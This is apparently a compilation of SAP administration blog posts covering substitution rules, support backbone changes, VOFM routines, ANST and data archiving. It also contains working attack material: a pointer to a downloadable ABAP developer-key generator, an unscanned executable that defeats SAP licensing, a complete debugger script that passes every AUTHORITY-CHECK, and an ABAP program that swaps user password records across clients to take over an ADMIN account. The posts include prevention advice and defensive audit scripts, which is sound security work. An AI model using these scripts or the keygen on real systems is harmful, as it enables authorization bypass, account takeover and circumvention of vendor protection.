Generating substitution and validation rules

In the FICO module the consultant can define substitution and validation rules. These rules must be generated before they are active.

Questions that will be answered in this blog are:

  • How can I generate substitution and validation rules?
  • Where can I find more background on substitution and validation rules?

Substitution and validation rules generation

Go to SE38 and start program RGUGBR00:


Substitutions and validations

Simply select the correct application area as indicated by the FICO consultant (this area can be FI, CO, etc.). Select Generate validations and Generate Substitutions. Now execute.

Transport and system copies

You will need to run program RGUGBR00 locally on the system after the transport import is done.

Also after a system copy program RGUGBR00 must be run again.

See OSS note 1793212 – Transport validation or/and substitution.

Background on substitutions and validations

The full functional background on substitution and validation can be found on this SAP wiki.

SAP support backbone update

The SAP support backbone update is live per 1.1.2020. Blocking started as of 8.1.2020. If you did not prepare your systems for it, you might lose support functions.

Per 31.07.2020 the sending of EWA’s via RFC towards SAP will no longer work. See OSS note 2923799 – Final Shutdown of RFC Connections From Customer Systems to SAP. At the same date OSS notes downloads via RFC will be fully blocked. Also the RTCCTOOL will stop working (see OSS note 2934203 – ST-A/PI 01T* SP01 – 01U SP00: SAP backbone connectivity for RTCCTOOL on basis 700-731 after RFC shutdown).

You can get or will already get messages like:

Access denied

SAP note 2847665 – OSS RFC Connection fails will refer you to the SAP Backbone connection update site.

Also on the main SAP support site there is this warning message:

Which refers to first-aid kit OSS note: 2874259 – First Aid Kit for Problems Related to SAP’s Support Backbone Switch-Over Starting on 8 January 2020.

Questions that will be answered in this blog are:

  • Where can I find more background information on the SAP support backbone update?
  • Where can I find first aid support?
  • Do I need to upgrade SAP solution manager?
  • How to switch to digitally signed OSS notes?
  • Do I need to change my OSS RFC’s?
  • What else do I need to do?
  • How to check the correct setup in the SAP EWA report?
  • Where can I find a checklist to see if I am completely done?

Background information on SAP support backbone update

The landing page for SAP support backbone update can be found by following this link.

The webinar recording explaining all the highlights can be found by following this link.

The official OSS note is 2737826 – SAP Support Backbone Update / upcoming changes in SAP Service and Support Backbone interfaces (latest) in January 2020.

2 important OSS notes for quick start of actions:

And the new first aid kit OSS note:

2874259 – First Aid Kit for Problems Related to SAP’s Support Backbone Switch-Over Starting on 8 January 2020

Quick overview of all your systems in SAP service marketplace

SAP now provides the overview of your systems which are not ok in a special online overview. Follow this link. Your result can look like this:

What will change per 1.1.2020?

Basically the connection from SAP solution manager and from the on premise SAP systems to the SAP backbone will change. This will impact many areas like OSS notes, EWA’s, landscape planning etc.

What do you need to do if you don’t want to lose any functionality?

Solution manager

If you don’t want to lose any functionality in SAP solution manager you will need to upgrade to Solution manager 7.2 to support package 7 or 8. If you are on 8 you have to do less manual work than on 7. On solution manager support packs 5 and 6 some functions will work, but with manual work and limitations. On solution manager 7.1 and solution manager 7.2 up to support pack 3, the connection to SAP support backbone will be lost on 1.1.2020. You can already upgrade to SP8 now and prepare solution manager.

For the automatic configuration of the connectivity follow the instructions in OSS note 2738426 – Automated Configuration of new Support Backbone Communication.

OSS notes

For OSS notes there are 2 changes: the RFC to SAP and digitally signed OSS notes.

For the RFC connection read and follow the instructions from OSS note 2740667 – RFC connection SAPOSS to SAP Service & Support backbone will change (latest) in January 2020.

OSS notes via SNOTE must be switched to digitally signed OSS notes. How to do this: see blog.

Next to this, you will need to change the OSS note RFC destination. The generic user will no longer work. You will need to change it to a named technical user, or change the connection from RFC to HTTPS connectivity.

If you set up digitally signed OSS notes there is an option for fallback to insecure.

Attention: this fallback will no longer work after 1.1.2020.

ANST

ANST is a great function to help you find OSS notes relevant for your issue. For more explanation on ANST look at this blog. The ANST reaches out to the SAP support backbone to check for recent notes. To keep the function working you need to set up a new webservice in SOAMANAGER (if the SOAP runtime is not active follow instructions in this blog). To set up the specific webservice follow the instructions in OSS note 2730525 – Consuming the Note Search Webservice. Then apply OSS note 2732094 – ANST- Implementing SOAP Based ANST Note Search and 2818143 – SEARCH_NOTES- Implementing SOAP Based Note Search.

While switching to new SAP support backbone you might get a connection error. Follow the instructions from OSS note 2781045 – ANST / ST22 note search “Connection cannot be established” to solve it.

Other calls

See OSS note 2722027 – Certain OSS RFC APIs calls replaced with corresponding web service calls.

Online checklists

SAP has now published online checklists, based on your solution manager version. You can find the checklists on this link.

Support backbone configuration check in EWA report

If you install ST-A/PI 01T sp02 or higher in your system (see OSS note 2827332 – Service Data not Complete due to ST-A/PI not Up-to-date), the EWA report of that system will give information about the correct connection to SAP support backbone and correct use of technical user for the communication.

Example:

In the process OSS note 2802999 - SDCCN activation fails without errors or red icons in Migrate tab might need to be applied as well to solve an SDCCN error.

All background information can be found in OSS note 2823658 – EWA Checks for SAP Backbone Connectivity.

SDCCN error notes

SAP is having some issues with the SDCCN coding for the backbone connectivity. If you experience issues there, check out the following OSS notes:

Requirements and formulas

This blog explains post-processing for requirements and formulas.

Questions that will be answered are:

  • How do requirements and formulas work?
  • How does generation via program RV80HGEN work?
  • How to automate RV80HGEN in transport?

VOFM: formulas

Formulas are maintained in transaction VOFM.

The start screen is just a menu:

VOFM start screen

The background of VOFM for all its options is explained in OSS note 327220 – VOFM function and its objects.

In this example we will code a new requirement for pricing (one of the most used topics for VOFM). Select the menu entry Requirements and then pricing:

Custom requirement for pricing

If you build your own routines, they have to use the 900 series. Unfortunately the call-off requires an SSCR object key. Save your 900 series entry.

Now double click on the routine to go into the editor:

Custom code for custom requirements

Now you can insert the custom code for your routine. Since the system regards it as a modification, you will have to use the modification editor.

Program generation

After you finish the routine, you have to generate it. Run program RV80HGEN to regenerate the routines. If you don’t do the generation run, your routine (or updated routine) will not be called.

Generation after transport

After you transport the routine to a quality or productive system, the newly transported routine is not generated there. So you need to run RV80HGEN in the target system. You can automate this by putting an XPRA action for program RV80HGEN in the transport. Then, as the final step after import, the RV80HGEN run will be triggered automatically.

To do this: go to your transport request or task. Switch to Change mode. Insert row. Enter program ID R3TR, object type XPRA, object name RV80HGEN, hit enter. Now save the transport again.

OSS note 598475 – XPRA RV80HGEN when transporting VOFM objects contains a modification to automate this for newly created routines. But this does not work for changes of routines.

Relevant OSS notes

In case of issues, check these OSS notes:



ABAP developer keys and object keys hack

A lot of basis and ABAP people feel protected by the ABAP keys and object keys for standard SAP changes. They have to be called off at SAP marketplace keys section.

Let me already give away the clue: since quite some time there is a KeyGen for ABAP and object keys. The protection is gone.

This blog will answer following questions:

  • Where can I download the ABAP keygen?
  • How to run the ABAP keygen?
  • How should I protect my system from unwanted ABAP changes?
  • S4HANA does not use developer keys and object keys any more, how should I protect my S4HANA system from unwanted ABAP changes?

Where can I download the ABAP keygen?

Google for SAP IWR Object key generator. Or click here for a copy:

Upon download: rename the file to .zip and unzip it.

New version W10 compliant, but not scanned (download and use at own risk!)

Credits for this version: Hugos.

Running ABAP keygen

Running the executable is simple. But you need to run it in Windows 7 compatibility mode.

Keygen screen

Fill out the data and hit generate…. that’s all.

The use of this tool is at your own risk. Most admins don't like you to use this tool at all.

The whole idea of this blog is to show that you should not rely on the developer key procedure.

How should I protect developments?

The best way to protect your development is to carefully grant the S_DEVELOP privilege. Only give it to the right people and only give it to develop Z* range of code.

Deletion of old developer keys is still relevant. Read the dedicated blog on deletion of developer keys.

S4HANA developer key

The title is a bit misleading. In S4HANA there are no developer keys and object keys any more.

Background of this change by SAP can be found in OSS note: 2309060 – The SSCR license key procedure is not supported in SAP S/4 HANA.

So in S4HANA, you must set up authorizations for S_DEVELOP properly.

With S_DEVELOP you have to set create/change rights for the packages and/or objects. For custom code only hand out Z* privileges.

If you hand out a * for the objects or classes, then the developer can also change standard SAP.

For more background and further information, read this dedicated blog on ABAP protection in S/4HANA.


Custom ABAP set original system

After a copy of a system to a new system (like a sandbox) you will find out that the custom objects have a different original system, and all changes will open in the modification editor instead of the normal ABAP editor.

Questions that will be answered in this blog are:

  • How to change original system of an object?
  • How to mass change original system of all Z objects in one shot?

Changing original system of an object

To change the original system of an object, first start transaction SE03 to go to the transport organizer tools:

SE03 start screen

Select the tool Change Object Directory Entries:

Change object directories selection screen

Here you can select a specific program, function group, etc. In our case, we do a selection on the original system. This will give a list of all objects with that original system:

Change object directories objects list

If you select an object and press the Change Object Directory button, you can change the original system of a single object.

Mass change

To execute a mass change you need to select the top node first and then enter a command (not a menu option): key in mass in the command field:

Entry mass

Then hit enter and a new hidden popup will come:

Change to new original system

Now enter the new original system and press Ok. All objects are changed in one shot.

See also OSS note 2690211 – Mass change of Original System.

Emergency program

If for some reason it does not work you can use the below emergency program:

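* Replace 'SRC' with the old original system and 'TAR' with the new one.
DATA zlt_tadir TYPE TABLE OF tadir.
DATA zls_tadir TYPE tadir.

* Read all object directory entries that still point to the old system.
SELECT * FROM tadir INTO TABLE zlt_tadir WHERE srcsystem EQ 'SRC'.
LOOP AT zlt_tadir INTO zls_tadir.
  zls_tadir-srcsystem = 'TAR'.
  MODIFY tadir FROM zls_tadir.
* Return code per entry: 0 means the update succeeded.
  WRITE sy-subrc.
ENDLOOP.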

Debug scripting to bypass AUTHORITY-CHECK statements

How annoying these authorizations are… isn’t there a way to mass bypass them?

This blog will explain how you can do this with the use of debug scripting.

Recipe for bypassing authority-check via debug script

As input we need to have development rights with debug and replace (without replace it will not work).

Now we start a program like RSUSR003 in SE38 and find out we are not authorized:

RSUSR003

Now we start the debugger with /h and go to the scripting tab:

Script page

In the coding block of the script load this block of coding:

 *<SCRIPT:PERSISTENT>


*<SCRIPT:HEADER>
*<SCRIPTNAME>ZBYPASS</SCRIPTNAME>
*<SCRIPT_CLASS>LCL_DEBUGGER_SCRIPT</SCRIPT_CLASS>
*<SCRIPT_COMMENT>Debugger Skript: Default Template</SCRIPT_COMMENT>
*<BP_REACHED>X</BP_REACHED>

*</SCRIPT:HEADER>

*<SCRIPT:PRESETTINGS>
*<BP>
*<FLAGACTIVE>X</FLAGACTIVE>
*<KIND>1 </KIND>
*<STATEMENTSTA>AUTHORITY-CHECK</STATEMENTSTA>
*</BP>

*</SCRIPT:PRESETTINGS>

*<SCRIPT:SCRIPT_CLASS>
*---------------------------------------------------------------------*
*       CLASS lcl_debugger_script DEFINITION
*---------------------------------------------------------------------*
*
*---------------------------------------------------------------------*
CLASS lcl_debugger_script DEFINITION INHERITING FROM  cl_tpda_script_class_super  .

  PUBLIC SECTION.
    METHODS: prologue  REDEFINITION,
      init    REDEFINITION,
      script  REDEFINITION,
      end     REDEFINITION.

ENDCLASS.                    "lcl_debugger_script DEFINITION
*---------------------------------------------------------------------*
*       CLASS lcl_debugger_script IMPLEMENTATION
*---------------------------------------------------------------------*
*
*---------------------------------------------------------------------*
CLASS lcl_debugger_script IMPLEMENTATION.
  METHOD prologue.
*** generate abap_source (source handler for ABAP)
    super->prologue( ).
  ENDMETHOD.                    "prolog

  METHOD init.
*** insert your initialization code here
  ENDMETHOD.                    "init
  METHOD script.

****************************************************************
*Interface (CLASS = CL_TPDA_SCRIPT_DATA_DESCR / METHOD = CHANGE_VALUE )
*Importing
*        REFERENCE( P_NEW_VALUE ) TYPE STRING
*        REFERENCE( P_OFFSET ) TYPE I
*        REFERENCE( P_LENGTH ) TYPE I
*        REFERENCE( P_VARNAME ) TYPE STRING
****************************************************************

*************************************************
* debugger commands (p_command):
* Step into(F5)   -> CL_TPDA_SCRIPT_DEBUGGER_CTRL=>DEBUG_STEP_INTO
* Execute(F6)     -> CL_TPDA_SCRIPT_DEBUGGER_CTRL=>DEBUG_STEP_OVER
* Return(F7)      -> CL_TPDA_SCRIPT_DEBUGGER_CTRL=>DEBUG_STEP_OUT
* Continue(F8)    -> CL_TPDA_SCRIPT_DEBUGGER_CTRL=>DEBUG_CONTINUE
*************************************************
****************************************************************
*Interface (CLASS = CL_TPDA_SCRIPT_DEBUGGER_CTRL / METHOD = DEBUG_STEP )
*Importing
*        REFERENCE( P_COMMAND ) TYPE I
****************************************************************

****************************************************************
*Interface (CLASS = CL_TPDA_SCRIPT_ABAPDESCR / METHOD = LINE )
*Returning
*        VALUE( P_LINE ) TYPE I
****************************************************************

    TRY.
        CALL METHOD abap_source->line
          RECEIVING
            p_line = DATA(p_line).
      CATCH cx_tpda_src_info .
      CATCH cx_tpda_src_descr_invalidated .
    ENDTRY.

    TRY.
        CALL METHOD debugger_controller->debug_step
          EXPORTING
            p_command = cl_tpda_script_debugger_ctrl=>debug_step_over.
      CATCH cx_tpda_scr_rtctrl_status .
      CATCH cx_tpda_scr_rtctrl .
    ENDTRY.


****************************************************************
*Interface (CLASS = CL_TPDA_SCRIPT_DATA_DESCR / METHOD = CHANGE_VALUE )
*Importing
*        REFERENCE( P_NEW_VALUE ) TYPE STRING
*        REFERENCE( P_OFFSET ) TYPE I
*        REFERENCE( P_LENGTH ) TYPE I
*        REFERENCE( P_VARNAME ) TYPE STRING
****************************************************************

    TRY.
        CALL METHOD cl_tpda_script_data_descr=>change_value
          EXPORTING
            p_new_value = '0'
*           p_offset    = -1
*           p_length    = -1
            p_varname   = 'sy-subrc'.
      CATCH cx_tpda_varname .
      CATCH cx_tpda_scr_auth .
    ENDTRY.

  ENDMETHOD.                    "script
  METHOD end.
*** insert your code which shall be executed at the end of the scripting (before trace is saved)
*** here

  ENDMETHOD.                    "end
ENDCLASS.                    "lcl_debugger_script IMPLEMENTATION
*</SCRIPT:SCRIPT_CLASS>

*</SCRIPT:PERSISTENT>

Check the code by hitting the check button.

If the code is ok, set the break-point at ABAP command AUTHORITY-CHECK:

Breakpoint

Now click on the Start Script button.

End result: you can execute the program without any issues.

Explanation of the method

What has happened here? The debug scripting is nothing more than fast automation. The developer could have manually bypassed all the multiple authorization checks in this program. Now he lets the script take care of it: the coding of the script simply changes the SY-SUBRC value after any break-point (which is reached at statement AUTHORITY-CHECK) to 0, which is green light: pass.

Prevention

If you don’t want this to happen in your system there are 2 main measures to take:

  1. Remove debug & replace authorization from all non-ABAP developers in a development system and remove debug & replace from all non-development systems for all users
  2. Make sure you tell the ABAP developers that you are aware of this script. You cannot prevent them from running it, but you can tell them that if you find out it can have severe consequences.

See also OSS note 3226223 – How to monitor debug activities in SAP Netweaver.
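To review prevention measure 1 above, and the S_DEVELOP advice from the developer key sections, the following added example (not code from this blog or from SAP) scans role data for debug & replace and for create/change rights outside Z*. It assumes an export in the column layout of role table AGR_1251; the sample rows, role names and finding labels are constructed for the example.

```python
import csv
import io
from collections import defaultdict

# Constructed sample rows: role, authorization instance, object, field,
# value (LOW/HIGH) and deletion flag.
SAMPLE_AGR_1251 = """AGR_NAME,AUTH,OBJECT,FIELD,LOW,HIGH,DELETED
Z_DEV_CUSTOM,T-D1000100,S_DEVELOP,ACTVT,01,03,
Z_DEV_CUSTOM,T-D1000100,S_DEVELOP,DEVCLASS,Z*,,
Z_DEV_CUSTOM,T-D1000100,S_DEVELOP,OBJNAME,Z*,,
Z_DEV_CUSTOM,T-D1000100,S_DEVELOP,OBJTYPE,PROG,,
Z_DEV_WIDE,T-D1000200,S_DEVELOP,ACTVT,02,,
Z_DEV_WIDE,T-D1000200,S_DEVELOP,DEVCLASS,*,,
Z_DEV_WIDE,T-D1000200,S_DEVELOP,OBJNAME,*,,
Z_DEV_WIDE,T-D1000200,S_DEVELOP,OBJTYPE,*,,
Z_DISPLAY_ALL,T-D1000300,S_DEVELOP,ACTVT,03,,
Z_DISPLAY_ALL,T-D1000300,S_DEVELOP,DEVCLASS,*,,
Z_DISPLAY_ALL,T-D1000300,S_DEVELOP,OBJNAME,*,,
Z_DISPLAY_ALL,T-D1000300,S_DEVELOP,OBJTYPE,*,,
Z_SUPPORT_DEBUG,T-D1000400,S_DEVELOP,ACTVT,02,,
Z_SUPPORT_DEBUG,T-D1000400,S_DEVELOP,ACTVT,03,,
Z_SUPPORT_DEBUG,T-D1000400,S_DEVELOP,DEVCLASS,*,,
Z_SUPPORT_DEBUG,T-D1000400,S_DEVELOP,OBJNAME,*,,
Z_SUPPORT_DEBUG,T-D1000400,S_DEVELOP,OBJTYPE,DEBUG,,
Z_OLD_DEBUG,T-D1000500,S_DEVELOP,ACTVT,02,,X
Z_OLD_DEBUG,T-D1000500,S_DEVELOP,OBJTYPE,DEBUG,,X
"""

CUSTOMER_PREFIXES = ("Z",)        # the Z* rule from the text; add "Y" if used
CHANGE_ACTIVITIES = ("01", "02")  # create, change


def covers(low, high, value):
    """True if one authorization value (single, pattern or range) admits value."""
    if high:
        return low <= value <= high
    if low.endswith("*"):
        return value.startswith(low[:-1])
    return low == value


def is_custom_only(low, high):
    """True if the value can only match names in the customer range."""
    return low.startswith(CUSTOMER_PREFIXES) and (
        not high or high.startswith(CUSTOMER_PREFIXES))


def load_authorizations(csv_text):
    """Group active S_DEVELOP rows into {(role, auth): {field: [(low, high)]}}."""
    auths = defaultdict(lambda: defaultdict(list))
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["OBJECT"] != "S_DEVELOP" or row["DELETED"].strip():
            continue
        low = row["LOW"].strip()
        if low:  # blank values do not match a named object and are skipped
            key = (row["AGR_NAME"], row["AUTH"])
            auths[key][row["FIELD"]].append((low, row["HIGH"].strip()))
    return auths


def audit_s_develop(csv_text):
    """Return (role, authorization, finding) tuples, sorted by role."""
    findings = []
    for (role, auth), fields in sorted(load_authorizations(csv_text).items()):
        def grants(field, value):
            return any(covers(lo, hi, value) for lo, hi in fields.get(field, []))

        # Debug & replace: OBJTYPE DEBUG combined with ACTVT 02.
        if grants("OBJTYPE", "DEBUG") and grants("ACTVT", "02"):
            findings.append((role, auth, "DEBUG_REPLACE"))

        # Create/change on repository objects not limited to the customer range.
        changes = any(grants("ACTVT", a) for a in CHANGE_ACTIVITIES)
        non_debug = any((lo, hi) != ("DEBUG", "")
                        for lo, hi in fields.get("OBJTYPE", []))
        wide = [f for f in ("DEVCLASS", "OBJNAME")
                if any(not is_custom_only(lo, hi) for lo, hi in fields.get(f, []))]
        if changes and non_debug and wide:
            findings.append((role, auth, "CHANGE_OUTSIDE_Z:" + "+".join(wide)))
    return findings


if __name__ == "__main__":
    for finding in audit_s_develop(SAMPLE_AGR_1251):
        print(finding)
```

Roles are only half of the picture: a user can also receive the same authorization through a manually assigned profile, so the result is a starting list for review, not a complete inventory.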

ANST for webapplications and FIORI

In the blog on ANST we focused on searching notes for ABAP GUI applications. This blog will focus on web applications that run ABAP code in the backend (such as FIORI, BSP, webdynpro for ABAP).

Questions that will be answered in this blog are:

  • How do I use ANST for web applications?
  • What do I need to do to prepare my system for this?
  • What do I need to do for using ANST for FIORI back end recording?

System preparation for ANST for web applications

First you need to follow the instructions in OSS note 2286869 – ANST: Trace On/Off error “Dynamic Start and Stop cancelled by user” to get rid of the trace error. Unfortunately this note is not really clear. The short instruction on what to do follows now. Go to transaction FILE and search for the ANST_TRACES_GLOBAL. It should look like this:

ANST delete assignment of paths

Then select the logical file definition and delete the line for Physical path. Should look like this:

Now we are good to go for the web part recording, but not yet for FIORI.

ANST for FIORI

To use ANST for FIORI you first need to install OSS note 2605555 – ANST: Enhancement to support Fiori applications. Please also follow the manual steps in the note very carefully.

Tip: this note contains a very good PDF attachment as manual for ANST.

Run ANST for web application

Running ANST for web applications is not very much different from running on SAP GUI. Upon start of the ANST tool select your web application (which is a bit different per application):

ANST FIORI

After you now start with Execute you get a popup screen to confirm recording start:

ANST FIORI start

After pressing start your web browser will start and you can perform the actions you want to trace. To stop go back to the ABAP screen and press the Stop Recording button:

ANST FIORI stop

The rest of the ANST processing is the same as usual.

Reference OSS notes

Reference and bug fix notes:


SAP database growth control: data archiving business discussions

This blog addresses the main challenge in SAP data archiving for functional objects: the discussions with the business.

This blog will give answers to the following questions:

  • When to start data archiving discussion with the business?
  • How to come to good retention periods?
  • What are arguments for not archiving certain data?

Data archiving discussion with the business

Unlike technical data deletion, functional data archiving cannot be done without proper business discussion and approval.

Depending on your business several aspects for data are important:

  • Auditing and Sox needs
  • Tax and legal retention periods
  • Product data requirement
  • And so on…..

Here are some rules of thumb you can use before considering to start up the business discussions about archiving:

Rule of thumb 1: the system is pretty new. At least wait 3 years to get an insight into which tables are growing fast and are worth investigating for data archiving.
Rule of thumb 2: if your system is growing slowly, but the infrastructure capabilities grow faster: only perform technical clean up and don't even start functional data archiving.
Rule of thumb 3: if you are on HANA: use NSE (Native Storage Extension) or check if the data aging concept for functional objects is stable enough and without bugs. NSE and data aging do not require too much work, they are only technical and they do not require much business discussion. Data retrieval from end user perspective is transparent.

Data analysis before starting the discussion

If your system is growing fast and/or you are getting performance complaints, then you need to do proper data analysis before starting any business discussion.

Start with proper analysis on the data. Use the TAANA tool to get insights into the data: how is the distribution of data per document type, per year, per plant/company code etc. If you want to propose retention period of let’s say 5 years, you can use the TAANA results to show what percentage of data you can move out of the database.

Secondly: if you have an idea on which data you want to archive, first execute a trial run on a recent production copy. There might be functional blocks that prevent you from archiving data (like not closed documents).

Third important factor is the ease of data retrieval. Some objects have a nice simple data retrieval function, and some are really terrible. If the retrieval is good, the business will more easily accept a shorter retention period. Read more on technical data retrieval in this blog.

As last step you can start the business case: how much data will be saved (and hence how much money will be saved) and how much performance would be gained. And how much time needs to be invested for setting up, checking (testing!) and running the data archiving runs.

In practice data archiving business case is only present in very large systems of 5 TB and larger. This sizing tipping point changes in time as hardware gets cheaper and hourly manpower costs go up.

The discussion itself

Take plenty of time in planning for the discussion itself. It is not uncommon that archiving discussions take over a year to complete. The better you are prepared the easier the discussion. It also helps to have a few real performance pain points to get solved via data archiving. There is normally a business owner for this pain point who can help push data archiving.

ABAP where used index

A nice feature in ABAP is the where used function on usage of programs, tables, fields etc., in both standard and custom code. For this function to work properly the ABAP where used index must be up-to-date.

This blog will give answers to the following questions:

  • How to re-run the ABAP where used index?
  • How to speed up the ABAP where used index by running in parallel mode?
  • Which bug fix notes should I apply to get a good ABAP where used index?

How to run ABAP where used index?

You can run the programs SAPRSEUB and SAPRSEUC yourself in background, or start program SAPRSEUJ to schedule the jobs for you.

Program SAPRSEUB will index standard SAP objects. Program SAPRSEUC will index custom objects.

More background can be found in OSS note 18023 – Jobs EU_INIT, EU_REORG, EU_PUT. And OSS note 28022 – Customer system: Where-used list for SAP Objects.

S/4 HANA readiness check

For the S/4HANA readiness check (see note 2290622 – SAP Readiness Check for SAP S/4HANA) it is mandatory to run job SAPRSEUC. For more background information on the S/4 HANA readiness check see this blog.

Stopping the job

If for whatever reason you want to stop the jobs, use program SAPRSEUB_STOP.

Performance of the where used jobs using parallel processing

Check if OSS note 2228460 – Runtime of job EU_INIT, SAPRSEUB, performance is applied. Using settings in table RSEUPACTRL you can control the runtime behavior of the parallel execution of the where used indexing process. You can check in SM50 and SM66 if the job is using the parallel

OSS notes with bug fixes

The following bug fix OSS notes can be checked to see if they are valid for your release:

Cross client access hacking

Most people underestimate how easy it is to gain access from one client to another client. This blog will explain how easy it is to do it.

Questions that will be answered in this blog are:

  • How to execute a cross client access hack?
  • How to detect this attack?
  • What preventive measures should I take to prevent this in my systems?

Cross client hack explained

You have gained access to a maintenance client by any method (easiest is standard users: see blog on this topic). Some basis and security people will wave this away and say: “by having access to client 066 the hacker cannot do anything, since the real business data is stored in a different client”.

So what the hacker will do is simply open the system client for ABAP coding (SCC4 client opening works from any client). Then he loads this simple program:

REPORT ZSWAPUSER. 

data: zls_usr02_1 type usr02. 
data: zls_usr02_2 type usr02. 
data: zls_usr02_t type usr02. 

parameters p_uname1 type usr02-bname. 
parameters p_mandt1 type sy-mandt. 
parameters p_mandt2 type sy-mandt.

select single * from usr02 client specified into zls_usr02_1 where bname eq p_uname1 and mandt = p_mandt1. 

select single * from usr02 client specified into zls_usr02_2 where bname eq p_uname1 and mandt = p_mandt2. 

zls_usr02_t = zls_usr02_1. zls_usr02_t-mandt = p_mandt2. modify usr02 client specified from zls_usr02_t. 
write sy-subrc. 

zls_usr02_t = zls_usr02_2. zls_usr02_t-mandt = p_mandt1. 
modify usr02 client specified from zls_usr02_t. 
write sy-subrc.

In the hacked source client a new user will be created. Let’s say the user ADMIN, which also exists in the target client. The hacker creates the user and sets the password in the source client he has access to. Now he runs the program. The program simply reads the password cross client (yes, ABAP can do cross client reading and updating), and then swaps them…..

After the swap the hacker will logon to the target client with the password he has set and enjoys all the roles from the user ADMIN. After he is done, he simply runs the program again. Then the old password is put back again.

Detecting this attack

Detecting this attack directly is very difficult. There are traces:

  • Client opening and closing in the source client
  • The presence of the ABAP code
  • The ABAP action in the source client’s audit log (you did switch on the audit log in all clients, didn’t you? And if you didn’t, read this blog on how to do it and execute it!)
  • ADMIN access from same terminal as the hacker is using to logon to the source client
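The traces listed above become useful when they are correlated. The following added example (not code from this blog) flags a logon to another client, under another user name, from the same terminal that changed client settings shortly before. The event tuples, terminal names and event labels are constructed placeholders, not real audit log message IDs; map them to whatever your audit log export delivers.

```python
from datetime import datetime, timedelta

# Constructed events: (timestamp, client, user, terminal, event label).
SAMPLE_EVENTS = [
    ("2024-03-04 09:00", "066", "EARLYWATCH", "WS-4471", "LOGON"),
    ("2024-03-04 09:05", "066", "EARLYWATCH", "WS-4471", "CLIENT_SETTINGS_CHANGED"),
    ("2024-03-04 09:12", "066", "EARLYWATCH", "WS-4471", "REPORT_STARTED"),
    ("2024-03-04 09:15", "100", "ADMIN", "WS-4471", "LOGON"),
    ("2024-03-04 09:20", "100", "ADMIN", "WS-0012", "LOGON"),
    ("2024-03-04 09:40", "066", "EARLYWATCH", "WS-4471", "CLIENT_SETTINGS_CHANGED"),
    ("2024-03-04 11:30", "100", "JSMITH", "WS-4471", "LOGON"),
]


def parse(events):
    """Convert timestamps and return the events in chronological order."""
    return sorted(
        (datetime.strptime(ts, "%Y-%m-%d %H:%M"), client, user, term, kind)
        for ts, client, user, term, kind in events)


def find_cross_client_logons(events, window_minutes=60):
    """Flag logons that follow a client settings change from the same
    terminal, but in a different client and under a different user name."""
    parsed = parse(events)
    window = timedelta(minutes=window_minutes)
    findings, seen = [], set()
    for t0, src_client, src_user, term, kind in parsed:
        if kind != "CLIENT_SETTINGS_CHANGED":
            continue
        for t1, client, user, term1, kind1 in parsed:
            hit = (kind1 == "LOGON" and term1 == term
                   and client != src_client and user != src_user
                   and t0 <= t1 <= t0 + window)
            key = (term, client, user, t1)
            if not hit or key in seen:
                continue
            seen.add(key)  # report each logon once, against the earliest change
            # Supporting trace: what the source user did between change and logon.
            activity = [k for t, c, u, tm, k in parsed
                        if (c, u, tm) == (src_client, src_user, term)
                        and t0 <= t <= t1]
            findings.append({
                "terminal": term,
                "source": (src_client, src_user),
                "target": (client, user),
                "minutes_after_change": int((t1 - t0).total_seconds() // 60),
                "source_activity": activity,
            })
    return findings


if __name__ == "__main__":
    for finding in find_cross_client_logons(SAMPLE_EVENTS):
        print(finding)
```

The check only works when audit logging is active in every client, including the maintenance clients, because the client settings change and the target logon are recorded in different clients.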

Preventive measures

The following preventive measures can be taken:

  • Reset all standard passwords in all systems in all clients (see blog)
  • Delete no longer needed clients 001 and 066 (see blog)
  • Switch on audit logging in all clients (see blog)